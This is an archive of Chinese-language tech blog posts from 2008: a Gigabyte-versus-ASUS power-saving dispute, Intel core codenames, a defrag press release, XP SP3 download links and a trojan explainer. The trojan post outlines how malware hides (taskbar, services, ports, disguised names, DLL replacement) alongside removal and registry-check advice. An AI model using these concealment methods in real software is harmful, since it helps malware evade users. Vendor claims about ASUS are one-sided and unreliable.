
處理器:INTEL Q6600(1066FSB)
主機板:華碩P5K SE/EPU、技嘉 EP35-DS3L
記憶體:Geil DDR2-1066 1GBx2
顯示卡:技嘉 NX86S256
硬碟:Western Digital 80 GB
電源供應器:Coolermaster RS850-EMBA





技嘉EP35-DS3L比ASUS P5K SE/EPU擁有更加的每瓦效能



技嘉實際找來華碩P5K SE/EPU以及自家的EP35-DS3L,其餘硬體列表如上,分別開啟EPU的Max Power Saving模式(Walk Mode)與DES Level 3狀態,透過多項測試軟體,結果證明EP35-DS3L獲得最佳每瓦效能。此次在P45春季插拔大會,技嘉科技技術行銷部經理-江望平先生也在現場展示這兩款測試平台,當場進行PK來證明簡報中提出的結果,EPU開啟的系統耗電量比DES系統最多需要13W電力,同時我們也發現,ASUS系統的EPU軟體運作時,若手動更改執行模式的話,更造成系統重新開機,技嘉DES軟體則無此項嚴重問題。





技嘉發現ASUS P5K SE/EPU的EPU晶片沒有任何作用


ASUS P5K SE/EPU的EPU功能僅由軟體控制非硬體達成


技嘉也表示,經實際量測電源供應相位變化後發現,ASUS P5K SE/EPU的EPU晶片根本沒有任何作用,ASUS強調的省電技術僅是軟體控制達成,而且EPU晶片就是一顆PWM晶片,關於這點也有部分媒體提出同樣看法。



技嘉提出EPU造假論點



EPU根本是假的




DES與EPU支援特點比一比


另外,技嘉科技也提出ASUS主機板產品的用料有魚目混珠之嫌,根本是愚弄消費者,例如P5K SE/EPU採用鋁殼電容以及台製固態電容,並非是ASUS宣稱優異的用料,鋁殼電容仍會有爆漿的顧慮,而技嘉所有主機板皆搭載Chemico、Fujitsu日系廠牌的固態電容,使得主機板更加穩定,但產品售價並未因此超越ASUS主機板。






ASUS P5K SE/EPU主機板採用台製固態電容


ASUS P5K SE/EPU主機板採用鋁殼電容



技嘉所有主機板皆搭載Chemico、Fujitsu日系廠牌的固態電容



對於技嘉的指證歷歷,看來ASUS有需要提出相關正確說明,如此才有可能建立廣大消費者的信心,否則日後即使大力行銷EPU省電技術,恐難獲得使用者的認同,未來我們若接到ASUS方面說法再行報導。

2008年5月10日 星期六

不論是在blog中或是雜誌上,筆者經常會提起一些Intel CPU的核心代號,雖然這部份難不倒一般讀者,但是有時候卻會看到「Conroe」與「Conroe-2M」等更細分的名稱,而且更詭異的是,明明E2000系列是1MB L2 Cache,為什麼核心代號卻是寫「Conroe-2M」呢?為了不要變成人人看不懂的火星文,還是另開這篇文章特別說明。

其實每個核心代號都代表其中一種晶片,例如E2000系列都是「Conroe-2M」晶片屏蔽1MB Cache所得的產物(E2140 rev.G0的特殊個案就先不講)。以下將詳細說明目前在Intel CPU中,共有哪幾種不一樣的晶片,因為LGA775封裝上固定都有金屬蓋,無法直接看到晶片外觀,再加上目前Intel在桌上型與筆記型處理器中,都是採共用同一顆晶片的方式,所以它們的「長相」只能使用筆記型處理器來說明。

————————————————————————————————————————


核心代號:Merom(Conroe)雙核心/Kentsfield四核心

L2 Cache完整數量:4MB/4MBx2
半導體製程:65nm
Die size:143mm2/143mm2 x2
每片12吋晶圓產出數量:約438/219
CPUID:06FXh,X=1、4、5、6、7、B
Stepping版本:A1、B0、B1、B2、B3、G0
代表型號:
大部分E6000系列雙核心
所有Q6000系列四核心
E4700

說明:這是Core 2系列最先上場的一顆晶片,它的相關衍生物到今日仍踞市場主流。只要把兩顆Conroe雙核心封裝在同一基板上,就成Kentsfield四核心。雖然這算是非原生的「假四核」,但它卻擁有成本上的優點,若與Die size相近的AMD Agena四核心做比較,每片晶圓的產出量將是219 VS. 208個。

————————————————————————————————————————


核心代號:Merom-2M(Conroe-2M)雙核心

L2 Cache完整數量:2MB
半導體製程:65nm
Die size:111mm2
每片12吋晶圓產出數量:約573
CPUID:06FXh,X=2、D
Stepping版本:L2、M0
代表型號:
E4700除外的E4000系列雙核心
小部份E6400與E6300雙核心
E2000系列雙核心
E1000系列雙核心

說明:因為Intel並沒有將兩顆Conroe-2M拼裝成四核心晶片,所以它的衍生物只有雙核心產品。某些媒體會把這個核心代號稱為「Allendale」,早期的CPU-Z程式也是如此,但是自從Core 2發表後,在Intel的官方文件上並沒有提到這個名詞,它也是把這顆晶片稱為「Conroe-2M」,較後期的CPU-Z也把Allendale「正名」為Conroe。

————————————————————————————————————————

核心代號:Merom-L(Conroe-L)單核心

L2 Cache完整數量:1MB
半導體製程:65nm
Die size:81mm2
每片12吋晶圓產出數量:約798
CPUID:1066Xh,X=0、1
Stepping版本:A0、A1
代表型號:Celeron 400系列

說明:Celeron 400系列的L2 Cache只有512K,其實完整1MB的晶片,都被Intel拿去作成Celeron-M 500系列了,在LGA775桌上型CPU中,只有一顆Conroe-L 2.8GHz工程版擁有完整的1MB Cache,算是非常稀有的珍品。雖然Conroe-L的生產成本不高,發熱量也很低,可惜在雙核心已成主流的現代,它的身影並不被大多數人所注意。

————————————————————————————————————————


核心代號:Penryn(Wolfdale)雙核心/Yorkfield四核心

L2 Cache完整數量:6MB/6MBx2
半導體製程:45nm
Die size:107mm2/107mm2 x2
每片12吋晶圓產出數量:約596/298
CPUID:1067Xh,X=1、4、6、7、A
Stepping版本:B0、B1、C0、C1、E0(E0版約第四季才上市) 代表型號:
E8000系列雙核心
Q9X50系列四核心

說明:作為Intel第一款45nm製程的Core 2處理器,Wolfdale的核心面積縮得比Conroe-2M還要小,在成本與發熱量上本身就有優勢。而在這個時期的四核心仍是沿用兩顆雙核心拼裝的方式,Yorkfield核心事實上就是兩顆Wolfdale晶片。而C1版相較於C0版,「聽說」是修正兩顆晶片在溝通上所發生的問題,所以C1版只存在於Yorkfield四核心中。

————————————————————————————————————————


核心代號:Penryn-3M(Wolfdale-3M)雙核心/Yorkfield-6M四核心

L2 Cache完整數量:3MB/3MBx2
半導體製程:45nm
Die size:82mm2/82mm2 x2
每片12吋晶圓產出數量:約788/394
CPUID:1067Xh,X=1、4、6、7
Stepping版本:L0、L1、M0、M1
代表型號:
E7000系列雙核心
E3000系列雙核心
Q9X00系列四核心

說明:除了L2 Cache達6MB的Wolfdale以外,Intel應該是為了成本考量,再設計一款簡裝版晶片,就是原生L2 Cache 3MB的Wolfdale-3M,這個情況跟當初的Conroe與Conroe-2M相同。只不過Wolfdale-3M的Die size極小,約略等於上代Conroe-L低階產品的水準,而且Intel也利用這個晶片,拼裝出成本極低的四核心產品,就是目前市場上的Q9300,與即將上市的Q9400。換句話說,Q9300並不是一款L2 Cache經過「閹割」的晶片,而且核心也和Q9450、Q9550不同。另一個讓人感到疑惑的是,Wolfdale與Wolfdale-3M擁有相同的CPUID,這都不符合先前慣例,因此某些較早期的CPU-Z版本,會發生Wolfdale與Wolfdale-3M都認成C0版本的現象,也是到最近的新版才修正。

————————————————————————————————————————

核心代號:Penryn-L(Wolfdale-L)單核心?

L2 Cache完整數量:2MB?
半導體製程:45nm
Die size:60mm2?
每片12吋晶圓產出數量:約1092?
CPUID:?
Stepping版本:?
代表型號:?

說明:PCADV的外稿作者某水球大大,說這顆晶片應該存在。只不過目前還沒有相關產品面世,而且細部情報一切未明,先列出來看看。

2008年5月9日 星期五

BW:對你的個人電腦進行磁碟重組以提高系統性能

你有定期重組電腦磁碟的習慣嗎?

由於檔案系統格式的原罪

我們的磁碟在使用一定時間後就會開始出現檔案分佈凌亂分散等狀況

嚴重造成使用效率降低影響電腦運作速度

這時候就需要進行磁碟重組幫助磁碟重新整理檔案

這可以增加硬碟的使用壽並命且提高他的效率

個人建議最好3個月到半年進行一次磁碟重組

若是網路一族.常常在下載東西或是安裝新玩意兒的玩家更要定期重組

但是大家不要以為一直重組電腦就會變快唷~

太過度的重組反而會造成硬碟折壽~

大家來看看以下的報導吧!!!

----------------------------------------------



美國商業資訊2008年5月8日印度孟買報導——許多公司因為工作站速度的下降在僅僅幾年之後就將其更換。由於不知道電腦為何在使用一定時間後就不可避免地出現性能下降,這些公司總是在購置新電腦上進行不必要的投入。但其實更換這些工作站是完全不必要的,你需要做的只是進行一下檔案磁碟重組。


嶄新的工作站因為能夠幫助提高員工生產率和公司競爭力,總是受到所有公司部門羨慕的眼光。然而這些相對較新的工作站不多久就開始顯露惱人的速度下降的跡象。於是公司在參考了一般工作站的壽命後,就認為該是將它們更換的時候了。一段時間之後,同樣的情形再一次發生,從而不斷要求你增加公司預算。


當然,這是美國企業界每天都會存在的一種常見誤解。他們堅信,有了嚴密的公司安全政策將病毒等拒之門外,工作站一般就可以維持令人滿意且穩定的性能水準。不幸的是,他們很快發現事情根本不是他們想像的那樣。隨著時間的推移,員工開始察覺到他們的硬碟都染上了一種奇怪的病症,它給檔案和系統性能都帶來了災難性的影響。其實這種病症就是我們通常所說的檔碎化。


所謂檔碎化,就是檔案分解成無數小塊雜亂地分佈於硬碟之上的現象。在用戶試圖打開檔案時,工作站不得不檢查其硬碟上的多個位置以讀取這些檔案碎片,這就使得硬碟讀取檔案的性能變得越來越差。


已經有人證明,不管使用方法及使用程度如何,所有工作站都會發生檔碎化。Diskeeper® 2008磁碟重組軟體的開發商Diskeeper公司(www.diskeeper.com)最近用微軟® Internet Explorer和Microsoft Word進行了一項為期兩週的實驗。測試選在一台沒有檔案碎片的普通工作站上進行。結果顯示,在沒有磁碟重組軟體的情況下,在短短兩週的時間裡,竟產生了4500多塊檔案碎片。由此我們可以輕易地看到檔案碎片累積並對整體系統性能造成影響的速度有多快。更多關於這項實驗的詳細情況可從Diskeeper公司網站上的“檔碎化探秘”(Myths of Fragmentation)欄目中獲得。


針對公司工作站執行有效的安全政策無疑是很好的防護措施,然而儘管有這些規章制度,那些用於處理資訊的大型工具還是可能經歷性能的減緩。磁碟重組軟體是解決此日益嚴重的問題並提升系統性能的唯一自動化解決方案。


--30--KG/la*


免責聲明:本公告之原文版本乃官方授權版本。譯文僅供方便瞭解之用,煩請參照原文,原文版本乃唯一具法律效力之版本。


聯絡方式:Boyers MarketingBruce Boyers:818-637-2625beboyers@earthlink.net

免費軟體俯拾即是 微軟Office新勁敵

現在網路真的是很發達

電腦也越來越普及了

除了使用市面上的"正版"&"盜版"軟體之外

其實使用者還有另一個選擇

那就是"正版"的"免費"軟體

其實這種軟體到處都找的到

而且各類型都有

其實已經可以完整取代掉絕大多數的付費程式了

請看以下來自路透社的報導(中央社翻譯)

------------------------------------------

有些電腦使用者並不是存心要用盜版產品,但他們也不喜歡花錢買軟體。這些人的電腦裡可能就會灌滿了像Symphony這樣的程式。Symphony是可從IBM網站(http://symphony.lotus.com)下載的免費套裝軟體,具備文書、表格、簡報等所有微軟(Microsoft Corp.)Office套裝軟體的功能。


免費軟體曾一度幾乎只是反微軟的第一線使用者尋找替代付費軟體的成果。這種運動產生了大量的程式,但少有程式能像Linux作業系統一樣受到廣泛使用。


越來越普及的寬頻網路已經孕育出1種新型免費軟體。設計者會把程式放在他們自己的伺服器上,並讓檔案能夠相容,促進使用者之間的合作。


Google或較小的網路公司如私營的Zoho,都在網路上(http://docs.google.com和http://www.zoho.com)提供免費的辦公室套裝軟體。


核心研究(Nucleus Research)的分析師韋特曼(Rebecca Wettemann)表示,大部分網路上流傳的免費軟體通常無法進行精密的資料分析,但是實際上也很少有人真的使用這種功能。


她還說,Google文書編輯(Google Docs)和其他免費軟體對企業越來越具吸引力,因為企業都在尋找方法降低資訊技術成本。中央社(翻譯)

光碟片壽命只有20年 珍貴影像恐不保

你把光碟片當作可以長期甚至"永久"保存的儲儲存媒介嗎?

一個最新的報導打破傳統觀念...

光碟片是不容易保存的東西

包刮照光.潮濕.刮傷等...種種因素將影響光碟片的壽命

請看以下報導~

一則來自NOW NEWS的新聞
---------------------------------------------------

現在許多人喜歡拍照或是錄影來記錄生活點滴,許多家長更是精心的製作光碟,想讓小孩長大可以欣賞,其實光碟也是有壽命,而且市面上販售的光碟如果不好好保存,壽命只有20年。


一生只有一次的珍貴經驗,忙著用數位攝影機拍攝下來,希望為自己和寶貝留下永恆的記憶,不過家長可能不知道,這些畫面根本不可能永久保存,因為這一片片DVD壽命其實不長久。


根據日本數位資訊協會三年的研究發現,品質較差的DVD壽命最長只能保存11年,也就是等寶貝長大時,畫面早就變質不能看了,尤其是保管的方式,如果將DVD放在濕氣重的環境,濕氣會讓光碟反射層出現氣泡和腐蝕現象,更恐怖的是強烈的紫外線,只要將光碟放在太陽底下超過20天,光碟放出來的畫面會不斷跳動,聲音也不連貫,這片光碟已經不能看。


為了不要讓辛苦紀錄的影像毀於一旦,專家建議,光碟最好分成觀看用和保存用兩種,好好保存備份,才能將珍貴的一刻長久保存。

2008年5月8日 星期四

WindowsXP最新版本Service Pack 3(SP3)!!官方繁中文正式版

黑~

微軟終於出XP的SP3啦!!


微軟強調,XP SP3將包含Windows XP的所有更新程式,包括一些新功能特性。而安裝SP3並不會明顯改變Windows XP的使用者體驗,Windows XP SP3不會有Vista的一些功能。

XP SP3包含Windows XP全部安全、性能和穩定性更新(不包含IE7)。SP3的主要新功能包括:

‧黑洞路由偵測

‧網路存取保護(NAP)

‧安全選項介面更詳細

‧加強的管理員安全和服務策略入口

‧核心模式加密模組

‧Windows產品啟用方式改變:在安裝整合SP3的Windows XP時,可選擇不輸入序號安裝,可稍後輸入序號進行啟用。

Windows XP SP3可透過Windows Update或微軟下載中心進行升級。透過Windows Update進行更新時,容量大約70MB。而完整的SP3安裝包容量為580MB。

SP3可在全新安裝的Windows XP、SP1或SP2上進行升級,支援媒體中心版、Tablet PC版的各種版本。但僅支援32位x86版本,x64版本Windows XP需要安裝的升級包為Windows Server 2003 SP2。


號稱提高10%的效能耶!!

實際裝完感覺稍微有順一點~但是應該沒到10%吧!?

開機是有稍微變快啦!!!但是安裝完的第一次重新開機比較久

晚點用軟體測測看好了~

這麼好的東西~

當然要和各位網友分享啊

有人不知道SP3是什麼嗎?

Service Pack 3的縮寫

WindowsXP的新版本更新

主要針對舊版本的安全性以及效能做提升

也修正了舊版系統的種種錯誤及問題

主要就是針對舊版系統的改進增強就對了!!!

這次不再是只有英文版(VISTA SP1剛釋出的時候竟然沒中文!!可惡!!)

不管是台灣地區的網友或是對岸地區的網友都有對應的語系版本唷~

而且這是最終正式版本唷~

已經會出現在自動更新(windows Update)名單上了!!




來吧~

廢話不多說

載點在這裡

微軟官方載點

下載不必回文~不怕被人修改過有病毒~微軟官方版本^^

繁體中文版檔案大小大約300多MB

其他本本我沒下載過~大概也是320M上下吧~

在此強調

這是"官方最中正式版本"

已經可以在Windows Update更新名單中看到了

有需要的歡迎下載

載點在此


Windows XP SP3 版本資訊頁面
http://download.microsoft.com/download/8/7/1/87161d51-3cee-45ea-b856-ecbcafad6b93/relnotes.htm

Windows XP Service Pack 3 Overview - 繁體中文 http://www.microsoft.com/downloads/details.aspx?FamilyID=68c48dad-bc34-40be-8d85-6bb4f56f5110&DisplayLang=zh-tw

繁體中文正式版本安裝檔
http://download.microsoft.com/download/2/2/a/22a44f8b-2f1b-46a9-940a-cf4099fd1de9/WindowsXP-KB936929-SP3-x86-CHT.exe

這裡另外提供光碟映像檔版本的SP3升級檔請下載後燒錄到光碟中使用http://download.microsoft.com/download/2/4/5/24532e7c-59e8-45c6-9217-bf54be0ed492/xpsp3_5512.080413-2113_cht_x86fre_spcd.iso


附帶一提~

若TCPIP或是佈景主題等有破解過的網友需要重新破解

因為更新完都被回覆到預設值了唷!! 這邊就不提供了

有需要的上GOOGLE找一下囉~大家慢慢享用吧^^

2008年5月7日 星期三

部落格近期改版公告

為了提供更高的品質

即日起將重新規劃文章分類

將針對各細項做區分

並且將新增資訊安全(病毒防治)以及軟體推薦.下載兩大類主題文章

提供網友更多更豐富的資訊

敬請各位網友多多支持

敬請期待

Google.Yahoo兩大入口網站 員工上班像度假

你知道在Google或是Yahoo工作是多棒的一件事嗎?

不但有免費零食飲料暢飲...還有按摩椅...遊樂器...等等等的...

真是令人羨慕啊...

以下是一則來自自由時報的報導

大家看看吧~

----------------------------------------------------

什麼樣的員工最幸福?有吃?有玩?還是可以有最多的假期?國內網路軟體業者為吸引員工,提高向心力,在工作環境格外用心。Google台灣的新辦公室提供免費零食,與鼎泰豐小籠包;Yahoo!奇摩員工則是每個人都坐在市價三萬元的總裁椅上辦公;中華網龍每月麵包日,提供400位員工免費麵包;華義國際每月員工可在上班日結伴出遊,旅費由公司買單。


Google 免費提供食物


Google台灣昨慶祝成立兩週年,對媒體公開位於101大樓73樓的新辦公室,享有「百步之內必有食物」盛名的Google,台灣辦公室也提供免費食物。Google大中華區總裁李開復表示,Google政策是員工超過400人,才有專屬廚師為員工做菜,Google台灣目前員工60人,仍提供大量免費食物慰勞員工,無怪乎有所謂的「Google 15」,意指平均每位員工進Google後,都胖了15磅。


打開Google台灣辦公室的雙門冰箱,珍珠奶茶、鮮奶、布丁、優酪乳,會令女性尖叫的Haagen-Dazs冰淇淋,都可以隨便拿,上層一盒盒的外帶餐盒,仔細一看可是鼎泰豐小籠包,Google台灣工程研究所長簡立峰說,「餓了,微波加熱就可以吃。」還有便利商店營業用的冰櫃,存放各式飲料,小型廚房旁邊就是餐廳,架上滿滿都是零食與礦泉水,吃飽喝足,可以在73樓的高空美景襯托下打一場乒乓,或坐在太空艙型按摩椅上,徹底放鬆一下。


Yahoo!奇摩 設隔音遊戲室


Yahoo!奇摩辦公室近期也完成裝修,以電腦螢幕的畫素(pixel)為設計概念的入口牆面,描繪不同的人物與城市建築,讓人印象深刻。Yahoo!奇摩人力資源部資深總監陸文秀表示,裝修的重點在於增加近30間會議室,並將過去分散各處的娛樂設施集中在遊戲室。


Yahoo!奇摩的遊戲室除了投籃機、桌上足球、撞球台,還新增了女性員工最愛的「太鼓達人」遊戲機,陸文秀說,遊戲室特別加強隔音效果,讓工作的員工與休息的員工不會彼此干擾,「像我週末會帶孩子來公司,孩子覺得Yahoo!是個很有趣的地方。」


在「食」的部分,最受Yahoo!奇摩員工稱道的,要算是提供便宜飲料的販賣機,多種碳酸飲料一瓶只要五元,咖啡則是免費供應,不少前往洽商的合作夥伴會乘機買一瓶。此外,「因為員工整天盯著電腦,公司提供養生護眼中藥飲品,希望員工耳聰目明,」陸文秀說。最近也敲定請按摩師到公司提供員工按摩,預計未來一、兩週就可以讓員工預約。


網龍 每月有「麵包日」


托Yahoo!奇摩董事總經理鄒開蓮的福,該公司最近大手筆購入約500張Herman Miller的人體工學椅,市價高達三萬元,原本全公司只有鄒開蓮一人使用這張椅子,但她考慮到員工每天坐著時間長,決定為全體員工添購「總裁椅」,讓員工坐久也不會累。


遊戲軟體公司因工作時間長,不少公司也提供泡麵與零食,中華網龍訂定每個月第一個星期三是「麵包日」,提供400多個員工免費麵包。


華義 員工出遊公司出錢


華義國際則有福委會採購的爆米花機,每週四的「爆米花日」可狂吃爆米花;此外,還有上班日出遊的「華義歡樂日」,每週輪流由不同部門派出代表組團出外踏青,費用由公司支付。


遊戲橘子的員工餐廳「普橘島」,提供便宜的西式早餐與中式午餐,現烤三明治好吃到連友商員工都垂涎。

燒錄機保養四法則

現在燒錄機的速度在成倍的提高,價格也是越來越便宜了,擁有一台高速,便宜的燒錄機已不在是夢想。也許很多朋友都和筆者一樣已夢想成真了。但不知大家是否想到燒錄機實際上就是光碟機的一種,所以壽命也和光碟機一樣,不會太長,基本上也就兩年左右的壽命。可是對於我們來說,任何一個產品都希望能夠盡可能的多用上一段時間,以發揮它的最大能量。於是這就牽涉到了一個如何保養燒錄機的問題,那麼我們如何才能做到讓自己的燒錄機盡可能多的為自己工作上一段時間呢?下面是我自己保養燒錄機的幾點心得體會。


  第一,請注意:時刻保持燒錄機的清潔也是一件非常重要的事情,而這一點不僅僅是對燒錄機,對於所有的光碟機產品來說也都是同樣的,不過由於燒錄機具有將數據寫入光碟的功能,因而其本身的清潔程度就顯得愈發的重要,如果在光頭上存在有灰塵的話,那麼刻錄失敗的可能性就會大大的增加,而這對於燒錄機本身來說也是沒有任何的好處,所以我們還要記住一定不要頻繁的將燒錄機的托盤暴露在外,以免灰塵進入燒錄機內部。憑筆者的一些經驗,這樣平時多注意點,雖然有點麻煩,但燒錄機回好用的多。

  第二,儘量的不要讓燒錄機做一些讀盤方面的工作,買燒錄機的人一般都是了雙光碟機,因此還CD-ROM做它的本質工作吧,從而可以讓燒錄機專注於刻錄工作,大大降低了燒錄機的使用率,其壽命的提高就是必然的事情了。

  第三,這也是最重要的一點。對燒錄機來說,盤片的質量對其使用壽命的長短起著很關鍵的作用,如果您平常所選擇的大部分都是市場中那些廉價的劣質盤片,那麼燒錄機在工作的時候必定會有一些吃力,從而會造成燒錄機的過度“疲勞”,所以燒錄機的使用時間減少自然就是一件很正常的事情了。對於這個問題的解決方法其實還是很簡單的,只要大家選擇一個比較不錯的品牌的刻錄盤產品,並且一直用下去的話,那麼您會發現燒錄機的壽命會大大的延長,雖然在盤上我們多付出了一些資金,可是燒錄機能多用上很長時間豈不是一件更好的事情呢?

  第四,那就是盡可能的不要讓燒錄機連續的工作,凡是用過燒錄機的朋友肯定都會知道,在一張光碟刻錄完成之後從燒錄機中取出的時候,光碟都是略微發熱的,而如果連續刻錄數張盤之後,燒錄機以及刻錄出來的盤片摸起來都會有些燙手,對於電腦配件來說,高溫都不是一件什麼好的事情,CPU、硬盤是這樣,燒錄機自然也是不例外的,所以大家在刻錄的時候儘量不要讓燒錄機不間斷的連續進行刻錄工作,在工作過程當中時不時地讓燒錄機“休息”一下是絕對有好處的。

根據自己的心得,其實要操壞一台燒錄機來說,其實也不是那麼容易的事,尤其以現在的耐用度來說,還沒壞就已經想換新的款式與倍數了,哪還等到壞,最常見的是雷射功率的衰減,造成讀取或是燒錄不良,但是目前都有燒不死技術而言,我想也不是太大問題,所以....安心的的看,安心的使用,更要快樂的燒錄,注意小細節即可.

2008年5月6日 星期二

電腦木馬小常識

木馬小常識

特洛伊木馬(以下簡稱木馬),英文叫做「Trojan house」,其名稱取自希臘神話的特洛伊木馬記,它是一種基於遠端控制的黑客工具。在黑客進行的各種攻擊行為中,木馬都起到了開路先鋒的作用。

  一、木馬的危害

  相信木馬對於眾多網民來說不算陌生。它是一種遠端控制工具,以簡便、易行、有效而深受廣大黑客青睞。一台電腦一旦中上木馬,它就變成了一台傀儡機,對方可以在你的電腦上上傳下載檔案,偷窺你的私人檔案,偷取你的各種密碼及密碼訊息……中了木馬你的一切秘密都將暴露在別人面前,隱私?不復存在!

  木馬在黑客入侵中也是一種不可缺少的工具。就在去年的10月28日,一個黑客入侵了美國微軟的門戶網站,而網站的一些內定訊息則是被一種叫做QAZ的木馬傳出去的。就是這小小的QAZ讓龐大的微軟丟盡了顏面!

  廣大網民比較熟悉的木馬當數國產軟體冰河了。冰河是由黃鑫開發的免費軟體,冰河面世後,以它簡單的動作方法和強大的控制能力令人膽寒,可以說是達到了談「冰」色變的地步。

  二、木馬原理

  特洛伊木馬屬於客戶/服務模式。它分為兩大部分,即用戶端和服務端。其原理是一台主電腦提供服務(伺服器),另一台主電腦接受服務(客戶機),作為伺服器的主電腦一般會開啟一個預設的連接埠進行監聽。若果有客戶機向伺服器的這一連接埠提出連線請求,伺服器上的相應程式就會自動執行,來應答客戶機的請求。這個程式被稱為守護進度。以大名鼎鼎的木馬冰河為例,被控制端可視為一台伺服器,控制端則是一台客戶機,服務端程式G_Server.exe是守護進度,G_Client.exe是用戶端套用程式。

  為進一步瞭解木馬,我們來看看它們的隱藏模式,木馬隱藏方法主要有以下幾種:

  1.)在任務欄裡隱藏

  這是最基本的。若果在windows的任務來歷出現一個莫名其妙的圖示,傻子都會明白怎麼回事。在VB中,只要把form的Viseble屬性設定為False,ShowInTaskBar設為False程式就不會出現在任務欄裡了。

  2.)在任務管理器裡隱藏

  檢視正在執行的進度最簡單的方法就是按下ctrl+alt+del時出現的任務管理器。若果你按下ctrl+alt+del後可以看見一個木馬程式在執行,那麼這肯定不是什麼好的木馬。所以,木馬千方百計的偽裝自己,使自己不出現在任務管理器裡。木馬發現把自己設為「系統服務」就可以輕鬆的騙過去。因此希望通過按ctrl+alt+del發現木馬是不大現實的。

  3.)連接埠

  一台機器由65536個連接埠,你會注意這麼多連接埠麼?而木馬就很注意你的連接埠。若果你稍微留意一下,不難發現,大多數木馬使用的連接埠在1024以上,而且呈越來越大的趨勢。當然也有佔用1024以下連接埠的木馬。但這些連接埠是常用連接埠,佔用這些連接埠可能會造成系統不標準。這樣的話,木馬就會很容易暴露。也許你知道一些木馬佔用的連接埠,你或許會經常掃瞄這些連接埠,但現在的木馬都提供連接埠修改功能,你有時間掃瞄65536個連接埠麼?

  4.)木馬的加載模式隱蔽

  木馬加載的模式可以說千奇百怪,無奇不有。但殊途同歸,都為了達到一個共同的目的,那就是使你執行木馬的服務端程式。若果木馬不加任何偽裝。就告訴你這是木馬,你會執行它才怪呢。而隨著網站互動化進度的不斷進步,越來越多的東西可以成為木馬的傳播介質,JavaScript、VBScript、ActiveX、XLM……..幾乎www每一個新功能都會導致木馬的快速進化。

  5.)木馬的命名

  木馬服務端程式的命名也有很大的學問。若果你不做任何修改的話,就使用原來的名字。誰不知道這是個木馬程式呢?所以木馬的命名也是千奇百怪。不過大多是改為和系統檔案名差不多的名字,若果你對系統檔案不夠瞭解,那可就危險了。例如有的木馬把名字改為window.exe,若果不告訴你這是木馬的話,你敢移除麼?還有的就是變更一些後綴名,比如把dll改為dl等,你不仔細看的話,你會發現麼?

  6.)最新隱身技術

  目前,除了以上所常用的隱身技術,又出現了一種更新、更隱蔽的方法。那就是修改虛擬裝置驅動程式(vxd)或修改動態連線庫(DLL)。這種方法與一般方法不同,它基本上擺脫了原有的木馬模式—監聽連接埠,而採用替代系統功能的方法(改寫vxd或DLL檔案),木馬會將修改後的DLL置換系統已知的DLL,並對所有的函數呼叫進行過濾。對於常用的呼叫,使用函數轉信器直接轉信給被置換的系統DLL,對於一些事先約定好的特種情況,DLL會執行一些相應的動作。實際上這樣的木馬多只是使用DLL進行監聽,一旦發現控制端的連線請求就啟用自身,綁在一個進度上進行標準的木馬動作。這樣做的好處是沒有增加新的檔案,不需要開啟新的連接埠,沒有新的進度,使用一般的方法監測不到它,在標準執行時木馬幾乎沒有任何症狀,而一旦木馬的控制端向被控制端發出特定的訊息後,隱藏的程式就立即開始運作。
三、木馬防範工具

  防範木馬可以使用防火牆軟體和各種反黑軟體,用它們築起網上的馬其諾防線,上網會安全許多。

  網上防火牆軟體很多,推薦使用「天網防火牆個人版」。它是一款完全的免費的軟體,安裝成功後,它就變成一面盾牌圖表縮小到任務來的系統工作列裡,並時刻監視黑客的一舉一動,當有黑客入侵時,它就會自動報警,並顯示入侵者的IP位址。

  用滑鼠按兩下盾牌圖示,就會跳出天網的控制台,控制台上有「普通設定」、「進階設定」、「安全設定」、「檢驗」和「關於」五個標籤。點選「普通設定」標籤,會看到有局域網安全設定和互聯網安全設定兩個視窗。我們可以通過拖曳滑塊來分別設定他們的安全層級等級。在此建議普通使用者選取「中」(關閉了所有的TCP連接埠服務,但UDP連接埠服務還開放著,別人無法通過連接埠的漏洞來入侵,它阻擋了幾乎所有的藍屏攻擊和訊息洩漏問題,並且不會影響普通網路軟體的使用)

  在控制台上點「進階設定」就可以手動選取是否取消「與網路連線」「ICMP」、「IGMP」、「TCP監聽」、「UDP監聽」和「NETBIOS」這幾個選項。若果上網後有人想連線你的電腦,天網防火牆會將其自動攔截,並告警提示,同時在控制台的「安全紀錄」裡會將連線者的IP,協定,來源連接埠,防火牆採取的動作,時間記錄等攻擊訊息顯示出來。

  在控制台的「檢驗」、「關於」標籤裡主要有安全漏洞的說明,防火牆軟體的版本號、註冊人的號碼等訊息。若果你受到攻擊想立刻中斷網路,點一下控制台上的「停」就可以了。

  四、木馬的查殺

  木馬的查殺,可以採用自動和手動兩種模式。最簡單的移除木馬的方法是安裝掃毒軟體(自動),現在很多掃毒軟體能移除網路最猖獗的木馬,建議安裝金山毒霸或安全之星XP,它們在查殺木馬方面很有一套!

  由於掃毒軟體的升級多數情況下慢於木馬的出現,因此學會手動查殺非常必要。方法是:

  1.)檢查註冊表

  看HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curren Version和HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion下,所有以「Run」開頭的鍵值名,其下有沒有可疑的檔案名。若果有,就需要移除相應的鍵值,再移除相應的套用程式。

  2.)檢查啟動群組

  木馬們若果隱藏在啟動群組雖然不是十分隱蔽,但這裡的確是自動加載執行的好場所,因此還是有木馬喜歡在這裡駐留的。啟動群組對應的資料夾為:C:\windows\start menu\programs\startup,在註冊表中的位置:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell

  Folders Startup="C:\windows\start menu\programs\startup"。要注意經常檢查這兩個地方哦!

  3.)Win.ini以及System.ini也是木馬們喜歡的隱蔽場所,要注意這些地方

  比方說,Win.ini的[Windows]小節下的load和run後面在標準情況下是沒有跟什麼程式的,若果有了那就要小心了,看看是什麼;在System.ini的[boot]小節的Shell=Explorer.exe後面也是加載木馬的好場所,因此也要注意這裡了。當你看到變成這樣:Shell=Explorer.exe wind0ws.exe,請注意那個wind0ws.exe很有可能就是木馬服務端程式!趕快檢查吧。

  4.)對於下面所列檔案也要勤加檢查,木馬們也很可能隱藏在那裡

  C:\windows\winstart.bat、C:\windows\wininit.ini、Autoexec.bat。

  5.)若果是EXE檔案啟動,那麼執行這個程式,看木馬是否被裝入記憶體,連接埠是否開啟。若果是的話,則說明要麼是該檔案啟動木馬程式,要麼是該檔案捆綁了木馬程式,只好再找一個這樣的程式,重新安裝一下了。

  6.)萬變不離其宗,木馬啟動都有一個模式,它只是在一個特定的情況下啟動

  所以,平時多注意一下你的連接埠,檢視一下正在執行的程式,用此來監測大部分木馬應該沒問題的。

  只要我們能夠提高自身的素質,加強網路安全意識,遠離木馬是完全可能的,沒准你也能成為木馬查殺高手呢!

2004-6-12 04:33 PM

